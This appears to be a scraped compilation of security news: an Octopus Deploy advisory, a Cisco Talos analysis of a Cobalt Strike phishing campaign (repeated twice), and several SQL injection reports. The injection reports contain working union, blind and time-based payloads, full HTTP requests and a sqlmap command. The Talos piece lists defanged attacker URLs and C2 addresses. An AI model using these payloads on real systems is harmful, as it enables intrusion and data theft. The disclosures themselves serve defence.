In affected versions of Octopus Deploy it is possible to reveal the Space ID of spaces that the user does not have access to view in an error message when a resource is part of another Space.

Summary

Space ID is revealed in error messages when the resource is part of another space (CVE-2022-2760)

Advisory Number

2022-14

Discovery Date

22 Aug 2022

Patch Release Date

26 Aug 2022

Advisory Release Date

27 Sep 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

Low

CVE ID

CVE-2022-2760

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.3.10405 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a low rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Deploy it is possible to reveal the Space ID of spaces that the user does not have access to view in an error message when a resource is part of another Space.

The versions of Octopus Server affected by this vulnerability are:

*   All versions after 2019.5.7
*   All 2020.x and 2021.x versions
*   All 2022.1.x versions before 2022.1.3180
*   All 2022.2.x versions before 2022.2.7965
*   All 2022.3.x versions before 2022.3.10405

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.1.3180
*   2022.2.7965
*   2022.3.10405

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.3.10405). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.3.10405):**

If you have feature version...

...then upgrade to this version

2019.5.7 and greater

2021.1.3180 or greater

2020.x, 2021.x

2022.1.3180 or greater

2022.1.x

2022.1.3180 or greater

2022.2.x

2022.2.7965 or greater

2022.3.x

2022.3.10405 or greater

**Mitigation**

There is no known mitigation for CVE-2022-2760, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was found during internal testing by Scott Merchant at Octopus Deploy

CVE-2022-2760: Security Advisory 2022-14

By Chetan Raghuprasad and Vanja Svajcer.
 
Cisco Talos discovered a malicious campaign in August 2022 delivering Cobalt Strike beacons that could be used in later, follow-on attacks.
Lure themes in the phishing documents in this campaign are related to the job details of a government organization in the United States and a trade union in New Zealand. 
The attack involves a multistage and modular infection chain with fileless, malicious scripts. 
 
Cisco Talos recently discovered a malicious campaign with a modularised attack technique to deliver Cobalt Strike beacons on infected endpoints. 
The initial vector of this attack is a phishing email with a malicious Microsoft Word document attachment containing an exploit that attempts to exploit the vulnerability CVE-2017-0199, a remote code execution issue in Microsoft Office. If a victim opens the maldoc, it downloads a malicious Word document template hosted on an attacker-controlled Bitbucket repository. 
Talos discovered two attack methodologies employed by the attacker in this campaign: One in which the downloaded DOTM template executes an embedded malicious Visual Basic script, which leads to the generation and execution of other obfuscated VB and PowerShell scripts and another that involves the malicious VB downloading and running a Windows executable that executes malicious PowerShell commands to download and implant the payload. 
The payload discovered is a leaked version of a Cobalt Strike beacon. The beacon configuration contains commands to perform targeted process injection of arbitrary binaries and has a high reputation domain configured, exhibiting the redirection technique to masquerade the beacon's traffic. 
Although the payload discovered in this campaign is a Cobalt Strike beacon, Talos also observed usage of the Redline information-stealer and Amadey botnet executables as payloads. 
This campaign is a typical example of a threat actor using the technique of generating and executing malicious scripts in the victim's system memory. Defenders should implement behavioral protection capabilities in the organization's defense to effectively protect them against fileless threats. 
Organizations should be constantly vigilant on the Cobalt Strike beacons and implement layered defense capabilities to thwart the attacker's attempts in the earlier stage of the attack's infection chain. 
  
Initial vector
The initial infection email is themed to entice the recipient to review the attached Word document and provide some of their personal information. 
Initial malicious email message.

The maldocs have lures containing text related to the collection of personally identifiable information (PII) which is used to determine the eligibility of the job applicant for employment with U.S. federal government contractors and their alleged enrollment status in the government's life insurance program. 
The text in the maldoc resembles the contents of a declaration form of the U.S. Office of Personnel Management (OPM) which serves as the chief human resources agency and personnel policy manager for the U.S. federal government. 
 Contents of maldoc sample 1.

Another maldoc of the same campaign contains a job description advertising for roles related to delegating development, PSA plus — a prominent New Zealand trade union — and administrative support for National Secretaries at the Public Service Association office based out of Wellington, New Zealand. The contents of this maldoc lure resemble the legitimate job description documents for the New Zealand Public Service Association, another workers' union for New Zealand federal employees, headquartered in Wellington. 
 Contents of maldoc sample 2.

PSA New Zealand released this legitimate job description document in April 2022. The threat actor constructed the maldoc to contain the text lures to make it appear as a legitimate document on May 6, 2022. Talos' observation shows that the threat actors are also regular consumers of online news. 
 Attack methodologies
Attack methodologies employed by the actor in this campaign are highly modularised and have multiple stages in the infection chain.
Talos discovered two different attack methodologies of this campaign with a few variations in the TTPs', while the initial infection vector, use of remote template injection technique and the final payload remained the same. 
 Method 1
This is a modularised method with multiple stages in the infection chain to implant a Cobalt Strike beacon, as outlined below:
 Summary of attack method 1 infection chain.

Stage 1 maldoc: DOTM template
The malicious Word document contains an embedded URL, https[://]bitbucket[.]org/atlasover/atlassiancore/downloads/EmmaJardi.dotm, within its relationship component "word/_rels/settings.xml.rels". When a victim opens the document, the malicious DOTM file is downloaded.
 Contents of settings.xml.rels of maldoc.

Stage 2: VBA dropper
The downloaded DOTM executes the malicious Visual Basic for Applications (VBA) macro. The VBA dropper code contains an encoded data blob which is decoded and written into an HTA file, "example.hta," in the user profile local application temporary folder. The decoded content written to an HTA file is the next VB script, which is executed using the ShellExecuted method.  
 Stage 2 VBA dropper.

Stage 3 VB script
The third-stage VBS structure is similar to that of the stage 2 VB dropper. An array of the encoded data will be decoded to a PowerShell script, which is generated in the victim's system memory and executed. 
 Stage 3 VB script.

Stage 4 PowerShell script 
The PowerShell dropper script executed in the victim's system memory contains an AES-encrypted data blob as a base64-encoded string and another base64-encoded string of a decryption key. The encoded strings are converted to generate the AES encrypted data block and the 256-bit AES decryption key. Using the decryption key, the encrypted data generates a PowerShell downloader script, which is executed using the PowerShell IEX function.
 Stage 4 PowerShell script.

Stage 5 PowerShell downloader
The PowerShell downloader script is obfuscated and contains encoded blocks that are decoded to generate the download URL, file execution path and file extensions. 
The following actions are performed by the script upon its execution in victim's system memory:
 
The script downloads the payload from the actor controlled remote location through the URL "https[://]bitbucket[.]org/atlasover/atlassiancore/downloads/newmodeler.dll" to the user profile local application temporary folder. 
The script performs a check on the file extension of the downloaded payload file. 
If the payload has the extension .dll, the script will run the DLL using rundll32.exe exhibiting the use of sideloading technique. 
If the payload has an MSI file extension, the payload is executed using the command 
"msiexec /quiet /i <payload>".
If the payload is an EXE file, then it will run it as a process using the PowerShell commandlet
 Start-Process.
Upon running the payload, the script will hide the payload file to establish persistence by setting the "hidden" file system attribute of the payload file. 
 
During our analysis, we discovered that the downloaded payload is a Cobalt Strike DLL beacon. 
Stage 5 PowerShell downloader.

Method 2
The second attack method of this campaign is also modular, but is using less sophisticated Visual Basic and PowerShell scripts. We spotted that, in the attack chain, the actor employed a 64-bit Windows executable downloader which executes the PowerShell commands responsible for downloading and running the Cobalt Strike payload. 
Summary of attack method 2 infection chain.

Stage 1 maldoc: DOTM template
When a victim opens the malicious document, Windows attempts to download a malicious remote DOTM template through the URL "https[://]bitbucket[.]org/clouchfair/oneproject/downloads/ww.dotm," which was embedded in its relationship component of the file settings.xml.rels."
Contents of settings.xml.rels of maldoc.

Stage 2 VB script 
The DOTM template contains a VBA macro that executes a function to decode an encoded data block of the macro to generate the PowerShell downloader script and execute it with the shell function. 
Stage 2 VB script.

Stage 3 PowerShell downloader
The PowerShell downloader command downloads a 64-bit Windows executable and runs it as a process in the victim's machine. 
Stage 3 PowerShell downloader.

Stage 4 downloader executable
The downloader is a 64-bit executable that runs as a process in the victim's environment. It executes the PowerShell command, which downloads the Cobalt Strike payload DLL through the URL "https[://]bitbucket[.]org/clouchfair/oneproject/downloads/strymon.png" to the userprofile local application temporary directory with a spoofed extension .png and sideloads the DLL using rundll32.exe. 
Stage 4 downloader EXE.

The downloader also executes the ping command to the IP address 1[.]1[.]1[.]1 and executes the delete command to delete itself. The usage of ping command is to instill a delay before deleting the downloader. 

 Payload
Talos discovered that the final payload of this campaign is a Cobalt Strike beacon. Cobalt Strike is a modularised attack framework and is customizable. Threat actors can add or remove features according to their malicious intentions. Employing Cobalt Strike beacons in the attacks' infection chain allows the attackers to blend their malicious traffic with legitimate traffic and evade network detections. Also, with its capabilities to configure commands in the beacon configuration, the attacker can perform various malicious operations such as injecting other malicious binary into the running processes of the infected machines and can avoid having a separate injection module implants in their infection chain. 
 The Cobalt Strike beacon configurations of this campaign showed us various characteristics of the beacon binary:
 
 C2 server.
 Communication protocols.
 Process injection techniques.
 Malleable C2 Instructions.
 Target process to spawn for x86 and x64 processes.
 Watermark : "Xi54kA==".

Cobalt Strike beacon configuration sample.
The Cobalt Strike beacon used in this campaign has the following capabilities:

Executes arbitrary codes in the target processes through process injection. Target processes described in the beacon configuration related to this campaign include:
 		  x86:
		    "%windir%\syswow64\dns-sd.exe"
		    "%windir%\syswow64\rundll32.exe"
		    "%windir%\syswow64\dllhost.exe -o enable"
		  x64:
		    "%windir%\sysnative\getmac.exe /V"
		    "%windir%\sysnative\rundll32.exe"
		    "%windir%\sysnative\DeviceParingWizard.exe"

A high-reputation domain defined in the HostHeader component of the beacon configuration. The actor is using this redirector technique to make the beacon traffic appear legitimate and avoid detection. 
 
Malicious repository
The attacker in this campaign has hosted malicious DOTM templates and Cobalt Strike DLLs on Bitbucket using different accounts. We spotted two attacker-controlled accounts "atlasover" and "clouchfair" in this campaign: https[://]bitbucket[.]org/atlasover/atlassiancore/downloads and https[://]bitbucket[.]org/clouchfair/oneproject/downloads.
During our analysis, the account "atlasover" was live and showed us the hosting information of some of the malicious files in this campaign.  
Attacker-controlled bitbucket repository.
 
Talos also discovered in VirusTotal that the attacker operated the Bitbucket account "clouchfair," using the account to host two other information stealer executables, Redline and Amadey, along with a malicious DOTM template and Cobalt Strike DLL. 
 Command and control
Talos discovered the C2 server operated in this campaign with the IP address 185[.]225[.]73[.]238 running on Ubuntu Linux version 18.04, located in the Netherlands and is a part of the Alibaba cloud infrastructure. 
Shodan search results showed us that the C2 server contained two self-signed SSL certificates with the serial numbers 6532815796879806872 and 1657766544761773100, which are valid from July 14, 2022 - July 14, 2023. 
SSL certificate associated with the C2 servers.
Pivoting on the SSL certificates disclosed another cobalt strike C2 server with the IP address 43[.]154[.]175[.]230 running on Ubuntu Linux version 18.04 located in Hong Kong, which is also part of Alibaba cloud infrastructure and more likely be operated by the same actor of this campaign. 
 Coverage
 Ways our customers can detect and block this threat are listed below.

 Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.
Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them. 
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network. 
 Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort Rule 60600 is available for this threat.
The following ClamAV signatures have been released to detect this threat:
 Win.Packed.Generic-9956955-0
 Win.Malware.CobaltStrike-9968593-1
 Win.Dropper.AgentTesla-9969002-0
 Win.Dropper.Swisyn-9969191-0
 Win.Trojan.Swisyn-9969193-0
 Win.Malware.RedlineStealer-9970633-0
 IOC
 The IOC list is available in Talos' Github repo here.

By Chetan Raghuprasad and Vanja Svajcer.

*   Cisco Talos discovered a malicious campaign in August 2022 delivering Cobalt Strike beacons that could be used in later, follow-on attacks.
*   Lure themes in the phishing documents in this campaign are related to the job details of a government organization in the United States and a trade union in New Zealand.
*   The attack involves a multistage and modular infection chain with fileless, malicious scripts.

Cisco Talos recently discovered a malicious campaign with a modularised attack technique to deliver Cobalt Strike beacons on infected endpoints.

The initial vector of this attack is a phishing email with a malicious Microsoft Word document attachment containing an exploit that attempts to exploit the vulnerability CVE-2017-0199, a remote code execution issue in Microsoft Office. If a victim opens the maldoc, it downloads a malicious Word document template hosted on an attacker-controlled Bitbucket repository.

Talos discovered two attack methodologies employed by the attacker in this campaign: One in which the downloaded DOTM template executes an embedded malicious Visual Basic script, which leads to the generation and execution of other obfuscated VB and PowerShell scripts and another that involves the malicious VB downloading and running a Windows executable that executes malicious PowerShell commands to download and implant the payload.

The payload discovered is a leaked version of a Cobalt Strike beacon. The beacon configuration contains commands to perform targeted process injection of arbitrary binaries and has a high reputation domain configured, exhibiting the redirection technique to masquerade the beacon's traffic.

Although the payload discovered in this campaign is a Cobalt Strike beacon, Talos also observed usage of the Redline information-stealer and Amadey botnet executables as payloads.

This campaign is a typical example of a threat actor using the technique of generating and executing malicious scripts in the victim's system memory. Defenders should implement behavioral protection capabilities in the organization's defense to effectively protect them against fileless threats.

Organizations should be constantly vigilant on the Cobalt Strike beacons and implement layered defense capabilities to thwart the attacker's attempts in the earlier stage of the attack's infection chain.

**Initial vector**

The initial infection email is themed to entice the recipient to review the attached Word document and provide some of their personal information.

 Initial malicious email message.

The maldocs have lures containing text related to the collection of personally identifiable information (PII) which is used to determine the eligibility of the job applicant for employment with U.S. federal government contractors and their alleged enrollment status in the government's life insurance program.

The text in the maldoc resembles the contents of a declaration form of the U.S. Office of Personnel Management (OPM) which serves as the chief human resources agency and personnel policy manager for the U.S. federal government.

 Contents of maldoc sample 1.

Another maldoc of the same campaign contains a job description advertising for roles related to delegating development, PSA plus — a prominent New Zealand trade union — and administrative support for National Secretaries at the Public Service Association office based out of Wellington, New Zealand. The contents of this maldoc lure resemble the legitimate job description documents for the New Zealand Public Service Association, another workers' union for New Zealand federal employees, headquartered in Wellington.

 Contents of maldoc sample 2.

PSA New Zealand released this legitimate job description document in April 2022. The threat actor constructed the maldoc to contain the text lures to make it appear as a legitimate document on May 6, 2022. Talos' observation shows that the threat actors are also regular consumers of online news.

**Attack methodologies**

Attack methodologies employed by the actor in this campaign are highly modularised and have multiple stages in the infection chain.

Talos discovered two different attack methodologies of this campaign with a few variations in the TTPs', while the initial infection vector, use of remote template injection technique and the final payload remained the same.

**Method 1**

This is a modularised method with multiple stages in the infection chain to implant a Cobalt Strike beacon, as outlined below:

 Summary of attack method 1 infection chain.

  
**Stage 1 maldoc: DOTM template**

The malicious Word document contains an embedded URL, https\[://\]bitbucket\[.\]org/atlasover/atlassiancore/downloads/EmmaJardi.dotm, within its relationship component "word/\_rels/settings.xml.rels". When a victim opens the document, the malicious DOTM file is downloaded.

 Contents of settings.xml.rels of maldoc.

  
**Stage 2: VBA dropper**

The downloaded DOTM executes the malicious Visual Basic for Applications (VBA) macro. The VBA dropper code contains an encoded data blob which is decoded and written into an HTA file, "example.hta," in the user profile local application temporary folder. The decoded content written to an HTA file is the next VB script, which is executed using the ShellExecuted method.

 Stage 2 VBA dropper.

  
**Stage 3 VB script**

The third-stage VBS structure is similar to that of the stage 2 VB dropper. An array of the encoded data will be decoded to a PowerShell script, which is generated in the victim's system memory and executed.

 Stage 3 VB script.

  
**Stage 4 PowerShell script**

The PowerShell dropper script executed in the victim's system memory contains an AES-encrypted data blob as a base64-encoded string and another base64-encoded string of a decryption key. The encoded strings are converted to generate the AES encrypted data block and the 256-bit AES decryption key. Using the decryption key, the encrypted data generates a PowerShell downloader script, which is executed using the PowerShell IEX function.

 Stage 4 PowerShell script.

  
**Stage 5 PowerShell downloader**

The PowerShell downloader script is obfuscated and contains encoded blocks that are decoded to generate the download URL, file execution path and file extensions.

The following actions are performed by the script upon its execution in victim's system memory:

1.  The script downloads the payload from the actor controlled remote location through the URL "https\[://\]bitbucket\[.\]org/atlasover/atlassiancore/downloads/newmodeler.dll" to the user profile local application temporary folder.
2.  The script performs a check on the file extension of the downloaded payload file.
3.  If the payload has the extension .dll, the script will run the DLL using rundll32.exe exhibiting the use of sideloading technique.
4.  If the payload has an MSI file extension, the payload is executed using the command  
    "msiexec /quiet /i <payload>".
5.  If the payload is an EXE file, then it will run it as a process using the PowerShell commandlet  
    Start-Process.
6.  Upon running the payload, the script will hide the payload file to establish persistence by setting the "hidden" file system attribute of the payload file.

During our analysis, we discovered that the downloaded payload is a Cobalt Strike DLL beacon.

 Stage 5 PowerShell downloader.

  
**Method 2**

The second attack method of this campaign is also modular, but is using less sophisticated Visual Basic and PowerShell scripts. We spotted that, in the attack chain, the actor employed a 64-bit Windows executable downloader which executes the PowerShell commands responsible for downloading and running the Cobalt Strike payload.

 Summary of attack method 2 infection chain.

  
**Stage 1 maldoc: DOTM template**

When a victim opens the malicious document, Windows attempts to download a malicious remote DOTM template through the URL "https\[://\]bitbucket\[.\]org/clouchfair/oneproject/downloads/ww.dotm," which was embedded in its relationship component of the file settings.xml.rels."

 Contents of settings.xml.rels of maldoc.

  
**Stage 2 VB script**

The DOTM template contains a VBA macro that executes a function to decode an encoded data block of the macro to generate the PowerShell downloader script and execute it with the shell function.

 Stage 2 VB script.

  
**Stage 3 PowerShell downloader**

The PowerShell downloader command downloads a 64-bit Windows executable and runs it as a process in the victim's machine.

 Stage 3 PowerShell downloader.

  
**Stage 4 downloader executable**

The downloader is a 64-bit executable that runs as a process in the victim's environment. It executes the PowerShell command, which downloads the Cobalt Strike payload DLL through the URL "https\[://\]bitbucket\[.\]org/clouchfair/oneproject/downloads/strymon.png" to the userprofile local application temporary directory with a spoofed extension .png and sideloads the DLL using rundll32.exe.

 Stage 4 downloader EXE.

The downloader also executes the ping command to the IP address 1\[.\]1\[.\]1\[.\]1 and executes the delete command to delete itself. The usage of ping command is to instill a delay before deleting the downloader.

**Payload**

Talos discovered that the final payload of this campaign is a Cobalt Strike beacon. Cobalt Strike is a modularised attack framework and is customizable. Threat actors can add or remove features according to their malicious intentions. Employing Cobalt Strike beacons in the attacks' infection chain allows the attackers to blend their malicious traffic with legitimate traffic and evade network detections. Also, with its capabilities to configure commands in the beacon configuration, the attacker can perform various malicious operations such as injecting other malicious binary into the running processes of the infected machines and can avoid having a separate injection module implants in their infection chain.

The Cobalt Strike beacon configurations of this campaign showed us various characteristics of the beacon binary:

*   C2 server.
*   Communication protocols.
*   Process injection techniques.
*   Malleable C2 Instructions.
*   Target process to spawn for x86 and x64 processes.
*   Watermark : "Xi54kA==".

 Cobalt Strike beacon configuration sample.

The Cobalt Strike beacon used in this campaign has the following capabilities:

*   Executes arbitrary codes in the target processes through process injection. Target processes described in the beacon configuration related to this campaign include:

  x86:  
    "%windir%\\syswow64\\dns-sd.exe"  
    "%windir%\\syswow64\\rundll32.exe"  
    "%windir%\\syswow64\\dllhost.exe -o enable"

  x64:  
    "%windir%\\sysnative\\getmac.exe /V"  
    "%windir%\\sysnative\\rundll32.exe"  
    "%windir%\\sysnative\\DeviceParingWizard.exe"

*   A high-reputation domain defined in the HostHeader component of the beacon configuration. The actor is using this redirector technique to make the beacon traffic appear legitimate and avoid detection.

**Malicious repository**

The attacker in this campaign has hosted malicious DOTM templates and Cobalt Strike DLLs on Bitbucket using different accounts. We spotted two attacker-controlled accounts "atlasover" and "clouchfair" in this campaign: https\[://\]bitbucket\[.\]org/atlasover/atlassiancore/downloads and https\[://\]bitbucket\[.\]org/clouchfair/oneproject/downloads.

During our analysis, the account "atlasover" was live and showed us the hosting information of some of the malicious files in this campaign.

 Attacker-controlled bitbucket repository.

Talos also discovered in VirusTotal that the attacker operated the Bitbucket account "clouchfair," using the account to host two other information stealer executables, Redline and Amadey, along with a malicious DOTM template and Cobalt Strike DLL.

**Command and control**

Talos discovered the C2 server operated in this campaign with the IP address 185\[.\]225\[.\]73\[.\]238 running on Ubuntu Linux version 18.04, located in the Netherlands and is a part of the Alibaba cloud infrastructure.

Shodan search results showed us that the C2 server contained two self-signed SSL certificates with the serial numbers 6532815796879806872 and 1657766544761773100, which are valid from July 14, 2022 - July 14, 2023.

 SSL certificate associated with the C2 servers.

Pivoting on the SSL certificates disclosed another cobalt strike C2 server with the IP address 43\[.\]154\[.\]175\[.\]230 running on Ubuntu Linux version 18.04 located in Hong Kong, which is also part of Alibaba cloud infrastructure and more likely be operated by the same actor of this campaign.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.  
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.  
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.  
Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.  
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.  
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.  
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  
Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.  
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort Rule 60600 is available for this threat.

The following ClamAV signatures have been released to detect this threat:  
Win.Packed.Generic-9956955-0  
Win.Malware.CobaltStrike-9968593-1  
Win.Dropper.AgentTesla-9969002-0  
Win.Dropper.Swisyn-9969191-0  
Win.Trojan.Swisyn-9969193-0  
Win.Malware.RedlineStealer-9970633-0

**IOC**

The IOC list is available in Talos' Github repo here.

New campaign uses government, union-themed lures to deliver Cobalt Strike beacons

Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/update_booking.php.

**Online Tours & Travels management system v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Bains

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /tour/admin/update\_booking.php

Vulnerability location: /tour/admin/update\_booking.php?id=, id

dbname = tour1

\[+\] Payload: /tour/admin/update\_booking.php?id=-1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /tour/admin/update\_booking.php?id\=\-1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close

CVE-2022-40354: Bug_report/SQLi-3.md at main · songbingxue/Bug_report

Exam Reviewer Management System 1.0 is vulnerable to SQL Injection via the ‘id’ parameter.

    # Exploit Title: Exam Reviewer Management System 1.0 - ‘id’ SQL Injection
    # Date: 2022-02-18
    # Exploit Author:  Juli Agarwal(@agarwaljuli)
    # Vendor Homepage:
    https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html
    
    # Software Link:
    https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code
    
    # Version: 1.0
    # Tested on: Windows 10/Kali Linux
    
    
    
    Description – The ‘id’ parameter in Exam Reviewer Management System web
    application is vulnerable to SQL Injection
    
    Vulnerable URL - http://127.0.0.1/erms/?p=take_exam&id=1
    
    
    
    POC:-
    
    
    
    ---
    
    Parameter: id (GET)
    
    Type: boolean-based blind
    
    Title: AND boolean-based blind - WHERE or HAVING clause
    
    Payload: p=take_exam&id=1' AND 4755=4755 AND 'VHNu'='VHNu
    
    
    
    Type: error-based
    
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY
    clause (FLOOR)
    
    Payload: p=take_exam&id=1' OR (SELECT 8795 FROM(SELECT
    COUNT(*),CONCAT(0x71766a7071,(SELECT
    (ELT(8795=8795,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM
    INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MCXA'='MCXA
    
    
    
    Type: time-based blind
    
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    
    Payload: p=take_exam&id=1' AND (SELECT 2206 FROM (SELECT(SLEEP(5)))AhEo)
    AND 'vqGg'='vqGg---
    
    
    
    *SQLMAP COMMAND*
    
    
    
    *# sqlmap -u "127.0.0.1/erms/?p=take_exam&id=1
    <http://127.0.0.1/erms/?p=take_exam&id=1>" -p id --dbs --level 3*

CVE-2022-40877: Offensive Security’s Exploit Database Archive

Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/up_booking.php.

**Online Tours & Travels management system v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Bains

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /tour/admin/up\_booking.php

Vulnerability location: /tour/admin/up\_booking.php?id=, id

dbname = tour1

\[+\] Payload: /tour/admin/up\_booking.php?id=-1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /tour/admin/up\_booking.php?id\=\-1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close

CVE-2022-40353: Bug_report/SQLi-2.md at main · songbingxue/Bug_report

Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/update_traveller.php.

**Online Tours & Travels management system v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Bains

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /tour/admin/update\_traveller.php

Vulnerability location: /tour/admin/update\_traveller.php?id=, id

dbname = tour1

\[+\] Payload: /tour/admin/update\_traveller.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ // Leak place ---> id

GET /tour/admin/update\_traveller.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close

CVE-2022-40352: Bug_report/SQLi-1.md at main · songbingxue/Bug_report

Azure says cloud-native single sign-on with a passwordless option is most-requested new AVD feature in the product's history.

Microsoft Azure Virtual Desktop (AVD) users now have the option for single sign-on (SSO), as well as passwordless authentication, with the public preview of the latest Microsoft upgrade. 

"Today we're announcing the public preview for enabling an Azure AD-based single sign-on experience and support for passwordless authentication, using Windows Hello and security devices (like FIDO2 keys)," Microsoft's David Belanger explained in a blog post about the new feature's debut. 

According to the announcement of the public preview of the new cloud security feature, after users install the September Cumulative Update Preview, the features will be available on Windows 10 and 11, as well as Windows Server 2022. 

According to Belanger's post, the latest AVD upgrade will allow users to: 

*   Enable a single sign-on experience to Azure AD-joined and Hybrid Azure AD-joined session hosts when using the Windows and web clients
*   Use passwordless authentication to sign in to the host using Azure AD
*   Use passwordless authentication inside the session when using the Windows client
*   Use third-party Identity Providers (IdP) that integrate with Azure AD to sign in to the host

The Azure Academy tutorial for administrators explaining how to deploy the new updates said the new SSO option was the "most requested AVD feature of all time." 

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Microsoft Rolls Out Passwordless Sign-on for Azure Virtual Desktop

Online Birth Certificate Management System version 1.0 suffers from a cross site scripting vulnerability.

